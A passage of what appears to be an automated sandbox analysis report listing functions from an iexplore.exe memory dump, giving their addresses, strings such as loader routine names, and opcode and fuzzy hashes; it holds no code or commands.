                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: adea8d322b4f721e99e87b3421211a63a6805316a64bfd599853bcd0f9614553
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: ACC1BC312043429BEF64CF28C845B6FFBE5AF84358F184A2DF995CA290D775E505CB92
                                  Function 036CF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$$
                                  • API String ID: 0-233714265
                                  • Opcode ID: 25a738bf49c420346c2abb3076c7d076005c49e64d6326cca2d32e48a3012473
                                  • Instruction ID: c7f8fd37cb0161b82a75d42341c73b122d8f42a505dee62e86f7b9661830a5c6
                                  • Opcode Fuzzy Hash: 25a738bf49c420346c2abb3076c7d076005c49e64d6326cca2d32e48a3012473
                                  • Instruction Fuzzy Hash: 7161CA76A11789DBDB20DFA8C684BACF7B2FF44704F18406DD105AF680CB74A945CB94
                                  Function 036BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 036BA2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 036BA309
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: b729a2693275a8e4cb3672e9b18c3620ec0065e9569322eb6c9c3a396ec0b8cb
                                  • Instruction ID: b3ee9e5dc192504561e66e7c6e6ab3b87afb1728bebdf0bef02880ce224e3d77
                                  • Opcode Fuzzy Hash: b729a2693275a8e4cb3672e9b18c3620ec0065e9569322eb6c9c3a396ec0b8cb
                                  • Instruction Fuzzy Hash: 6341AC35A04659DBCB21DF99C944BAEB7B4EF85700F2884A9EC01DB392E235D981CF60
                                  Function 036E329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local\$@
                                  • API String ID: 0-380025441
                                  • Opcode ID: 0c61a78ce71894e68c649fbeff47e8f8f8af3eb52696180ba5c2b58ba093f04f
                                  • Instruction ID: de972e2453f9d06ae4d59c117638fe8b587228f201fcb309d0807892f58e82c4
                                  • Opcode Fuzzy Hash: 0c61a78ce71894e68c649fbeff47e8f8f8af3eb52696180ba5c2b58ba093f04f
                                  • Instruction Fuzzy Hash: 8631C47A109344AFC311DF28C580E6BFBE8EB85654F58092EF59587350DA34DD09CB92
                                  Function 036BC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: 31b6bbf6ad5f3e033ba660bd65580cb18c41fae6f565bbf440eaabb5e81801b6
                                  • Instruction ID: 5b28f105aaeb9e252c7074ac68bb303d7ce28c3fba05fa0a8c7fd35ae8bf4b19
                                  • Opcode Fuzzy Hash: 31b6bbf6ad5f3e033ba660bd65580cb18c41fae6f565bbf440eaabb5e81801b6
                                  • Instruction Fuzzy Hash: E1825B75E002589FDB24CFA9C980BEDFBB9BF49310F188169E859AB350D7709A81CF54
                                  Function 036B7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 001ff1fdad1cadd24486c5813b1dd5ee743dd335917bb0462a0df7fc8e42ade2
                                  • Instruction ID: 3972d8cc872d424a4dc230f17772c80068c7480ef31444582c6aaeeccae648e9
                                  • Opcode Fuzzy Hash: 001ff1fdad1cadd24486c5813b1dd5ee743dd335917bb0462a0df7fc8e42ade2
                                  • Instruction Fuzzy Hash: 02A157756087428FC320DF28C580A6ABBF9BFC8714F14896DE5859B350EB70E985CF96
                                  Function 036B973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                  • Instruction ID: cc46ba273ba2bcf0b737072bdd81ce32634dfafa054655181dc425ff88ce8cc7
                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                  • Instruction Fuzzy Hash: 34613A76D00219AFDB21DFA9C840BEEBBF4EF84714F144969E910B7290D7749A41CF60
                                  Function 0376B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PreferredUILanguages
                                  • API String ID: 0-1884656846
                                  • Opcode ID: 080f0d7bc29b6eeb739b19c7ab842fe628eaa90976c275b304f8fcf5b65c90e7
                                  • Instruction ID: 4bf774e54d5707fc31d6b833564caef24df0c4a77a533bfc093b4d454579b932
                                  • Opcode Fuzzy Hash: 080f0d7bc29b6eeb739b19c7ab842fe628eaa90976c275b304f8fcf5b65c90e7
                                  • Instruction Fuzzy Hash: 6B41BB36E00219ABCB11EAA7C850BEEF7B9EF89750F050169ED11EB250E674DD40C7A4
                                  Function 0372C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  • Opcode ID: cee81befe9a2e373cab825fe2b89e7278605a1a23fb7411457246e86118fd404
                                  • Instruction ID: 2d03ded4d8ac9eb9f6149a0f1dd197babb6254dbfa1ce23feb4c10e4f4b35140
                                  • Opcode Fuzzy Hash: cee81befe9a2e373cab825fe2b89e7278605a1a23fb7411457246e86118fd404
                                  • Instruction Fuzzy Hash: B94146B5D0062DAFDB21DA50CC85FDEB77CAB45714F0085E9EB08AB140DB709E499F98
                                  Function 037397A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: verifier.dll
                                  • API String ID: 0-3265496382
                                  • Opcode ID: 5110f6605d2c803c9e60660e7d338206b0c5dc29868375d930c23caad3a31f2d
                                  • Instruction ID: a4fecabd83abdc1e027795c3c2f44ed0ce64f2de2d1010c378d76a90cb79be2a
                                  • Opcode Fuzzy Hash: 5110f6605d2c803c9e60660e7d338206b0c5dc29868375d930c23caad3a31f2d
                                  • Instruction Fuzzy Hash: AE3195B6700301AFDB24DF299850BA6B6E5EBCB710F588479E745DF282E7B18C819750
                                  Function 0375705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: kLsE
                                  • API String ID: 0-3058123920
                                  • Opcode ID: 3dbf195eb68324260186377ad7f475cea9efb701aaca5ee742195c215b8d0b8b
                                  • Instruction ID: b0fcd2e7f633fa623cbe34a26a562d1c9c8208e6ffed236bccfe97021b963000
                                  • Opcode Fuzzy Hash: 3dbf195eb68324260186377ad7f475cea9efb701aaca5ee742195c215b8d0b8b
                                  • Instruction Fuzzy Hash: EB413A36501B944BE728FB74E849B65BBE4A7C0754F1C821DFC505E1C5C7F94485CBA1
                                  Function 036B5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx
                                  • API String ID: 0-89312691
                                  • Opcode ID: 611643bdac842f4a1201b0efc4246114afc509af7f0055b6a794802e3b2520ab
                                  • Instruction ID: a56ed1a74c5c43940926b426032d3ae3275988410d9d7848103547e684280785
                                  • Opcode Fuzzy Hash: 611643bdac842f4a1201b0efc4246114afc509af7f0055b6a794802e3b2520ab
                                  • Instruction Fuzzy Hash: 9B1193317456429BDB34DD1D89506F6B7B9EB87224F3C812AEA53CB390D671D8C28F80
                                  Function 0373106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrCreateEnclave
                                  • API String ID: 0-3262589265
                                  • Opcode ID: 8457b067070415a965f396bf38f76ce616e0f157036759db9946db94f63abd51
                                  • Instruction ID: 0da7110e365d75e6ce51a43df9c0d984f913fcb473ea2a3321d770cbcc50b6d2
                                  • Opcode Fuzzy Hash: 8457b067070415a965f396bf38f76ce616e0f157036759db9946db94f63abd51
                                  • Instruction Fuzzy Hash: D92134B15083449FC310EF1AC804A9BFBE8FBD6B40F404A1EB5A08B251DBB19404CB92
                                  Function 0370739A Relevance: .7, Instructions: 705COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49e882516df87232d0c688bfa9c5dd9cffe043fa367191dd1ba42d0ce76cf5cc
                                  • Instruction ID: d8f956a8cfdb6f5660b3ab60d0083183b5f689ef253f64baf8318ddc83d2ef11
                                  • Opcode Fuzzy Hash: 49e882516df87232d0c688bfa9c5dd9cffe043fa367191dd1ba42d0ce76cf5cc
                                  • Instruction Fuzzy Hash: 87426C75A00696DFDB18CF59C490AAEF7F6FF88214B18855DE852AB380D734F942CB90
                                  Function 036DB2C0 Relevance: .6, Instructions: 629COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 414b91839635b5c4c4e3c6bcb1a6205905665a2ce261fe3e9b060f5b9798c65b
                                  • Instruction ID: b03b25af0fb720b7a9e1c70aa21d7e5d503d6f2e9bfbaaa0417f3ef99421acbf
                                  • Opcode Fuzzy Hash: 414b91839635b5c4c4e3c6bcb1a6205905665a2ce261fe3e9b060f5b9798c65b
                                  • Instruction Fuzzy Hash: 37329B76E00219DBCF24DFA8D990BAEBBB5FF84714F19006DE805AB384E7359911CB90
                                  Function 03748158 Relevance: .6, Instructions: 617COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 472b12c21eb4017d6eacfeb82bc80e22bb37150fef5efd2174dd77ae11b0f33b
                                  • Instruction ID: c5cb665622dfc3d4de00151c72cd4c721d38cb5c1a5033b2539d5d5e64f1193c
                                  • Opcode Fuzzy Hash: 472b12c21eb4017d6eacfeb82bc80e22bb37150fef5efd2174dd77ae11b0f33b
                                  • Instruction Fuzzy Hash: BA426B75E102199FDB24CF69C881BADF7F5BF89300F188099E949EB242E735A981CF51
                                  Function 0375A118 Relevance: .6, Instructions: 591COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 876df49e9d2e2ed0df27548e63556276fffd03a0c72a209be6f00d03cb050033
                                  • Instruction ID: f01f9869d2f74f265dd90461717b1fddfb34162754c5c1af32891ad2f954db9b
                                  • Opcode Fuzzy Hash: 876df49e9d2e2ed0df27548e63556276fffd03a0c72a209be6f00d03cb050033
                                  • Instruction Fuzzy Hash: 1822D0746046518BDBAACF29C094772B7F1EF44304F088AAEFC868F285E7B5D452DB61
                                  Function 036A8397 Relevance: .4, Instructions: 380COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df5eb58d8189a5f69389b8dfba1648315c63978c335213852f9120a21b9fe9e0
                                  • Instruction ID: 6375102d4e556d3aa8afc302f6e64a62024bf2e0777b98622b5fd898df2828be
                                  • Opcode Fuzzy Hash: df5eb58d8189a5f69389b8dfba1648315c63978c335213852f9120a21b9fe9e0
                                  • Instruction Fuzzy Hash: D5D19075A00B16DBDB14DF68C890ABEBBF5EF44214F08466DE9169B280EB34DE45CF60
                                  Function 036BD7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67a3ae7574845f935b84c13be5be339f41f3432c92e9c7ebc4206a4f9f48e2d1
                                  • Instruction ID: 24ba8a08c7b0b10fc92eaf47c56355faf88fbe4c4e51dea5d4abed2e2e34f68c
                                  • Opcode Fuzzy Hash: 67a3ae7574845f935b84c13be5be339f41f3432c92e9c7ebc4206a4f9f48e2d1
                                  • Instruction Fuzzy Hash: 1FC1A176E002169FDB24CF5EC844BEEF7B6AF84710F188269D915AB380D770E991CB80
                                  Function 03738243 Relevance: .3, Instructions: 322COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction ID: c299c061ca7195196f63cc6910eaac5d844d27b12743616c72d34b690f7d239d
                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction Fuzzy Hash: 72B18E75A00608BFDF24DF95C940BABB7B9EF86304F14446DB9129B792DA34E90DCB11
                                  Function 036D90DB Relevance: .3, Instructions: 287COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b7eae5f877ae027e8d9350d433cb1a526826a77354752d1f32d51ec86a4eba0
                                  • Instruction ID: 8413ddcf4e7fe9eab9207a70b6b1b2d28c7ff9bc0eed901b42daf9d8ea624b97
                                  • Opcode Fuzzy Hash: 9b7eae5f877ae027e8d9350d433cb1a526826a77354752d1f32d51ec86a4eba0
                                  • Instruction Fuzzy Hash: AFA12A76910615AFEB22EF68CC91BBE77B9AF46750F054058FA00AF2A0D7759C10CFA4
                                  Function 036B83C0 Relevance: .3, Instructions: 281COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3630836e026e978126bba24c4b19df9d08a8a7440c1349bc3fd1d348f4b00cc
                                  • Instruction ID: 7b3f1e66e7f1c33fc58fd6107b835a2418940fc7fe061da6af4394956866e79c
                                  • Opcode Fuzzy Hash: b3630836e026e978126bba24c4b19df9d08a8a7440c1349bc3fd1d348f4b00cc
                                  • Instruction Fuzzy Hash: 38C146752083818FD764DF18C494BAAB7F9BF88304F48496DE9898B290D774E949CF92
                                  Function 036F0185 Relevance: .3, Instructions: 276COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 611493db99762f64f269ae975bb39e2ae5a22e74604e85f86590d5be63d7b363
                                  • Instruction ID: 5024a24573e2f8c52cb62a759849caa05ba88e21017965380d9901c79bf95e9e
                                  • Opcode Fuzzy Hash: 611493db99762f64f269ae975bb39e2ae5a22e74604e85f86590d5be63d7b363
                                  • Instruction Fuzzy Hash: C5A1C075B01B16DFDB24DF65C990BAAB7A5FF45314F084129EB059B382DB34E812CBA0
                                  Function 037360E0 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f5f40b76732db37ee3e5753a1f83e8b135d291a8f1f7c4f7d049263cf3be309
                                  • Instruction ID: 72e870da6cfaf391420614b4f88a9d553c41d435656df3460d91dc7b4dd02d79
                                  • Opcode Fuzzy Hash: 2f5f40b76732db37ee3e5753a1f83e8b135d291a8f1f7c4f7d049263cf3be309
                                  • Instruction Fuzzy Hash: 7D91B075E04219BFCB15CFA8D8C4BBEBBB5AF4A700F154169E510EB342D738E9009BA4
                                  Function 036CE3F0 Relevance: .3, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68f82baea0d267a4b99033800a7ddd1837249fd94003efc739df038a8bf3af9b
                                  • Instruction ID: d93b3542ae0e5c551377e4cbe00637b89cdb481b3d1ff3b39cb1eb996483fde5
                                  • Opcode Fuzzy Hash: 68f82baea0d267a4b99033800a7ddd1837249fd94003efc739df038a8bf3af9b
                                  • Instruction Fuzzy Hash: 67914576A106918BDB24DB18C494BBEB7B1EF85711F09806DED059F381EB36D902CBA1
                                  Function 036B1131 Relevance: .3, Instructions: 259COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1e38c6acc9435cd5bf4b7a9f45445352b096cf6a28831deb7c9ee171f42733d
                                  • Instruction ID: 49123752ef795fac45d491b20d6a0353f0fb6d070daa0bf8fb01b33388d0dd26
                                  • Opcode Fuzzy Hash: e1e38c6acc9435cd5bf4b7a9f45445352b096cf6a28831deb7c9ee171f42733d
                                  • Instruction Fuzzy Hash: 22B101756083809FD364CF28C590A6AFBF1BB89304F18496EF899CB352D370E985CB46
                                  Function 036DD090 Relevance: .2, Instructions: 217COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                  • Instruction ID: 8b85fb830a5c468b4d5281e48366411ab0766fdf9f63d78ec860adc5dfb6813e
                                  • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                  • Instruction Fuzzy Hash: 50819B76E001198BDF24DF6CC981BAEFBB2FF84304F19816ACC16BB740D63199558B91
                                  Function 036EE284 Relevance: .2, Instructions: 212COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07758d2a6865b0143c6c2277741bd484f6df11f7795a57fef880a29d0f6430c1
                                  • Instruction ID: 0d802367522a44950e56e76fddd33ae05d467e79c6aeb881016b0313a119b2d3
                                  • Opcode Fuzzy Hash: 07758d2a6865b0143c6c2277741bd484f6df11f7795a57fef880a29d0f6430c1
                                  • Instruction Fuzzy Hash: 40817D75A01609EFDB25CFA9C880AEEBBBAFF48310F14442DE555A7250D731AC49CB64
                                  Function 0373035C Relevance: .2, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction ID: 5edd0368e783b1eaf710d612690e7521c5b70edf71c2f687ef0b81ac27874345
                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction Fuzzy Hash: 91717B75A00619AFCB10DFA9C984EEEBBB8FF49300F144569E505EB251DB34EE01CB94
                                  Function 037462A0 Relevance: .2, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b7cd1a078c9f446e177873165be6c3814614268365783b249e0b452b03cb878
                                  • Instruction ID: c460b023555a7ddec44a828555491cf8e61850cab74841f1fac90841aadbfe67
                                  • Opcode Fuzzy Hash: 3b7cd1a078c9f446e177873165be6c3814614268365783b249e0b452b03cb878
                                  • Instruction Fuzzy Hash: AE710036200B01AFDB31DF18C854F6AB7B5EF46724F18882CE6568B2A0D774FA44DB50
                                  Function 0377132D Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96c103f1482813ab33322091caf19e7d49cee8358bf94f99d08a8a29cf185116
                                  • Instruction ID: 976de4fd66e4341e7db52158774670ffb3874ca5d7f59beb7b74e6a1f42bc496
                                  • Opcode Fuzzy Hash: 96c103f1482813ab33322091caf19e7d49cee8358bf94f99d08a8a29cf185116
                                  • Instruction Fuzzy Hash: CD814E75A00245DFCB09CF68C590AAEB7F1FF88310F1981A9E859EB355D734EA51CB90
                                  Function 0377903E Relevance: .2, Instructions: 186COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c50959fd8aacd9c7dd28b4e794355db695bb7200a0e1d48c3bc603894af9bc93
                                  • Instruction ID: 0745f4437aa0a754fdfc41a845da9a519a4f1e6fb2f8daa0f8f9ad759eec88c2
                                  • Opcode Fuzzy Hash: c50959fd8aacd9c7dd28b4e794355db695bb7200a0e1d48c3bc603894af9bc93
                                  • Instruction Fuzzy Hash: DC61E375201716AFDB15DF64C888BABFBA8FF89310F044629F9599B240DB30E910CB91
                                  Function 036B7703 Relevance: .2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_3680000_iexplore.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03013403942d6c14ddcd3174bbbf2dbe9dcc52c9c8e649160af72006a3d9c63c
